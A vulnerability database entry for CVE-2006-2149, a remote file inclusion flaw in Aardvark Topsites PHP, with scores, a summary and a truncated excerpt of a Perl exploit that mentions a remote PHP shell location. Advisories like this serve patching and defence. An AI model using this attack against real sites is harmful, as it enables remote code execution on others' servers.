6.4
CVSSv2

CVE-2006-2149

Published: 03/05/2006 Updated: 19/10/2017
CVSS v2 Base Score: 6.4 | Impact Score: 4.9 | Exploitability Score: 10
VMScore: 645
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:N

Vulnerability Summary

PHP remote file inclusion vulnerability in sources/lostpw.php in Aardvark Topsites PHP 4.2.2 and previous versions, when register_globals is enabled, allows remote malicious users to execute arbitrary PHP code via the CONFIG[path] parameter, as demonstrated by including a GIF that contains PHP code.

Vulnerable Product Search on Vulmon Subscribe to Product

avatic aardvark topsites php 4.2.2

Exploits

#!/usr/bin/perl # # Aardvark Topsites PHP <=422 Remote Command Execution Exploit # # Copyright (c) 2006 cijfer <cijfer@netti!fi> # All rights reserved # # never ctrl+c again # cijfer$ targetcom/dir # host changed to 'targetcom/dir' # cijfer$ # # to set your PHP shell location: # cijfer$ shell=myshellfi/phpshel ...